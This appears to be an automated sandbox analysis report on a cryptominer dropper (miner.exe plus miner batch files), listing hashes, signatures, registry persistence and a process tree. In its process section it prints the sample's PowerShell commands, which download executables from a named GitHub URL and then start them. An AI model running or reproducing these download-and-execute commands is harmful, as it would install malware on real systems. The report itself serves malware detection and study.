Overview
overview
10Static
static
mine_aeternity.bat
windows7_x64
1mine_aeternity.bat
windows10_x64
1mine_aion.bat
windows7_x64
1mine_aion.bat
windows10_x64
1mine_beam.bat
windows7_x64
1mine_beam.bat
windows10_x64
1mine_btcz.bat
windows7_x64
1mine_btcz.bat
windows10_x64
1mine_btg.bat
windows7_x64
1mine_btg.bat
windows10_x64
1mine_grin29.bat
windows7_x64
1mine_grin29.bat
windows10_x64
1mine_grin31.bat
windows7_x64
1mine_grin31.bat
windows10_x64
1mine_mnx.bat
windows7_x64
1mine_mnx.bat
windows10_x64
1mine_swap.bat
windows7_x64
1mine_swap.bat
windows10_x64
1mine_zero.bat
windows7_x64
1mine_zero.bat
windows10_x64
1miner.exe
windows7_x64
10miner.exe
windows10_x64
10Analysis
-
max time kernel
48s -
max time network
50s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-01-2021 15:47
Static task
static1
Behavioral task
behavioral1
Sample
mine_aeternity.bat
Resource
win7v20201028
Behavioral task
behavioral2
Sample
mine_aeternity.bat
Resource
win10v20201028
Behavioral task
behavioral3
Sample
mine_aion.bat
Resource
win7v20201028
Behavioral task
behavioral4
Sample
mine_aion.bat
Resource
win10v20201028
Behavioral task
behavioral5
Sample
mine_beam.bat
Resource
win7v20201028
Behavioral task
behavioral6
Sample
mine_beam.bat
Resource
win10v20201028
Behavioral task
behavioral7
Sample
mine_btcz.bat
Resource
win7v20201028
Behavioral task
behavioral8
Sample
mine_btcz.bat
Resource
win10v20201028
Behavioral task
behavioral9
Sample
mine_btg.bat
Resource
win7v20201028
Behavioral task
behavioral10
Sample
mine_btg.bat
Resource
win10v20201028
Behavioral task
behavioral11
Sample
mine_grin29.bat
Resource
win7v20201028
Behavioral task
behavioral12
Sample
mine_grin29.bat
Resource
win10v20201028
Behavioral task
behavioral13
Sample
mine_grin31.bat
Resource
win7v20201028
Behavioral task
behavioral14
Sample
mine_grin31.bat
Resource
win10v20201028
Behavioral task
behavioral15
Sample
mine_mnx.bat
Resource
win7v20201028
Behavioral task
behavioral16
Sample
mine_mnx.bat
Resource
win10v20201028
Behavioral task
behavioral17
Sample
mine_swap.bat
Resource
win7v20201028
Behavioral task
behavioral18
Sample
mine_swap.bat
Resource
win10v20201028
Behavioral task
behavioral19
Sample
mine_zero.bat
Resource
win7v20201028
Behavioral task
behavioral20
Sample
mine_zero.bat
Resource
win10v20201028
Behavioral task
behavioral21
Sample
miner.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
miner.exe
Resource
win10v20201028
General
-
Target
miner.exe
-
Size
17.2MB
-
MD5
adf909a4715a421cd8c683016e75d40a
-
SHA1
51f6dc871ec6bd0b8296e5d631287d425aa3270d
-
SHA256
138b049541b36ea37d12b9ef3f684aa5e99315e0ce5137e0bea89d39718faefe
-
SHA512
a2fff627245ad394fb68bc53f7b163b94b7dc950e23a6c3aedb14453cda858468f76aec32a74ba2034d169f69798b13a201b11cf939294690d7a16c7e3565073
Malware Config
Extracted
https://raw.githubusercontent.com/7gds/f/main/bild.exe
https://raw.githubusercontent.com/7gds/f/main/miner.exe
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
miner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce miner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" miner.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1524 powershell.exe 1524 powershell.exe 572 powershell.exe 572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 572 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
miner.exedescription pid process target process PID 1964 wrote to memory of 1524 1964 miner.exe powershell.exe PID 1964 wrote to memory of 1524 1964 miner.exe powershell.exe PID 1964 wrote to memory of 1524 1964 miner.exe powershell.exe PID 1964 wrote to memory of 1524 1964 miner.exe powershell.exe PID 1964 wrote to memory of 572 1964 miner.exe powershell.exe PID 1964 wrote to memory of 572 1964 miner.exe powershell.exe PID 1964 wrote to memory of 572 1964 miner.exe powershell.exe PID 1964 wrote to memory of 572 1964 miner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\miner.exe"C:\Users\Admin\AppData\Local\Temp\miner.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/7gds/f/main/bild.exe,https://raw.githubusercontent.com/7gds/f/main/miner.exe -Destination Ga.exe,FZ.exe;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process Ga.exe; Start-Process FZ.exe;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c
MD5c0e27af42e8ee2a65dd94077deab5d57
SHA1d8484132d3cf6820c8bc01c9218c5d9987979430
SHA2565da455a88cf42bab21dfb24a1e62c3eab395e76559b0639552b8dc873a671cc0
SHA512478dbe92901e849a7af397325ab76c7261af0a1739d2762209517a356397038e33f7beb690233924672699741ce6a0e0a41fd40a17ee1c5dccae84a144b8dba2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8
MD5df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422
MD5be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf
MD575a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6
MD55e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134
MD502ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD56ce6ea8241a8ebe530ccb3781f560941
SHA17725bf36b0db269c86bb4958d6aeeb304d75b372
SHA256b91ba8545be1a92c33513518d3c1c29eac2fdbb11b4fc36f97cfe8f1ab830869
SHA5127f976b8512ed77f0a045efb5d4f6507ad2b5df2a4a63bfd4b4e782906c696aa2697a0d90a081389baf1147906a030bb8cf282bd044f653c8ab9f99bacbbe5c1e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5db9fddd4596e5c7d749ff18a5e3c795b
SHA19743201e78bdd1e6096528e99d7d4dc5823a1224
SHA256593aa75c1d7be147d0eeb15fd9a43394a23f1ac2f0bc5392bfaa2fa7d90fa4ac
SHA512ddc4890532c0791e36da2ec2b5bd73bbe4ff40b52d16686d2461d162f91cc13d6aa3b2a1af542399bb488f7f3a2a6cfed9334a5a27c5f398bafe2d284fdcb474